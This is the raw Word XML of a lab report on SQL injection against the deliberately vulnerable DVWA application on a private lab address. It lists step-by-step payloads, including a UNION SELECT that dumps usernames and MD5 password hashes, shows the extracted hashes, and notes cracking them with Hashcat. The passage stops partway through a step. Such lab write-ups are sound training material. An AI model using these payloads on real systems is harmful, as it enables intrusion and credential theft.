          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="2F5496"/>
          </w:tcPr>
          <w:p w14:paraId="56FDB6D4" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00F7222E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="6EACFD76" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03994A82" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00F7222E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Injection point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ACBFCC6" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00F7222E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> GET parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="19097572" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D848748" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00F7222E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Vulnerable code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6046D941" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00F7222E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">SELECT </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>first_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>last_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> FROM users WHERE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>user_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> = '$id'; — no sanitization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="0F789233" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AEB604C" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00F7222E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Confirmation payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52D9FAD5" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00F7222E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'  →</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> SQL syntax error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="3FDAF21C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F8D79AF" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00F7222E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Column count payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1181E92C" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00F7222E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">2' ORDER BY 3 -- </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-  →</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> error confirms 2 columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="2321025E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D86EDB1" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00F7222E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Data extraction payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C59911E" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00F7222E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>2' UNION SELECT user, password FROM users -- -</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CF4032" w14:paraId="54AAE72B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44649B27" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00F7222E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62A0FA30" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRPr="00F7222E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F7222E">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Full dump of usernames and MD5 password hashes for all 5 users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B357AD" w14:paraId="68432D79" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AA741F1" w14:textId="272F4085" w:rsidR="00B357AD" w:rsidRDefault="00B357AD">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D999703" w14:textId="41FD22DD" w:rsidR="00B357AD" w:rsidRDefault="00B357AD">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B55FD51" w14:textId="6CE3E091" w:rsidR="00981708" w:rsidRDefault="00AA28FA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA28FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SCREENSHOTS </w:t>
      </w:r>
      <w:r>
        <w:t>-:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F182DBF" w14:textId="4E3DB13F" w:rsidR="00AA28FA" w:rsidRDefault="00AA28FA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20B26215" wp14:editId="03E1BA5B">
            <wp:extent cx="5821680" cy="2798885"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1905"/>
            <wp:docPr id="146817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25514" cy="2800728"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79991CB9" w14:textId="550BF0D5" w:rsidR="00981708" w:rsidRDefault="00981708" w:rsidP="00981708">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Injecting the SQL commands to get the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBB1451" w14:textId="7D2B1A33" w:rsidR="00AA28FA" w:rsidRDefault="00AA28FA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="763BE61F" wp14:editId="3DFADD33">
            <wp:extent cx="5943600" cy="2857500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="151519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019E7D74" w14:textId="147B2317" w:rsidR="00AA28FA" w:rsidRDefault="00AA28FA" w:rsidP="00AA28FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Hashacat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to decode the md5 hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096D63EA" w14:textId="0343FC03" w:rsidR="00AA28FA" w:rsidRDefault="00AA28FA">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="577F2EAB" wp14:editId="52F9388A">
            <wp:extent cx="5943600" cy="2857500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1874269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E29935E" w14:textId="6B3C4135" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Resulting query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C077362" w14:textId="77777777" w:rsidR="00CF4032"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 xml:space="preserve">SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>first_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>last_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> = '2' UNION SELECT user, password FROM users -- -';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E26891" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Extracted data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD26728" w14:textId="77777777" w:rsidR="00CF4032"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 xml:space="preserve">admin  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5f4dcc3b5aa765d61d8327deb882cf99</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>gordonb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> e99a18c428cb38d5f260853678922e03</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">1337   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8d3533d75ae2c3966d7e0d4fcc69216b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>pablo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0d107d09f5bbe40cade3de5c71e9e9b7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">smithy </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5f4dcc3b5aa765d61d8327deb882cf99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECC3342" w14:textId="77777777" w:rsidR="00CF4032" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Commands / payloads executed (in order):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD760FE" w14:textId="77777777" w:rsidR="00CF4032"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lastRenderedPageBreak/>
        <w:t>Step 0 - Reconnaissance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>Navigated to http://192.168.100.20/dvwa/vulnerabilities/sqli/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>Observed page requires a 'User ID' input tied to a GET parameter (id)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Tested baseline/normal input to observe expected </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>id=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>id=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>Observed output: ID, First name, Surname fields reflected back for valid IDs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>Noted page footer showing session context:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>Username: admin | Security Level: low | PHPIDS: disabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>Conclusion: 'id' parameter is the sole user-controlled input and a likely injection point</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>Step 1 - Confirm injection point:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>2'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Step 2 - Confirm </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>-based injection:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>2' OR '1'='1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>Step 3 - Determine column count:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>2' ORDER BY 3 -- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:br/>
        <w:t>Step 4 - Confirm UNION injection (DB fingerprint):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
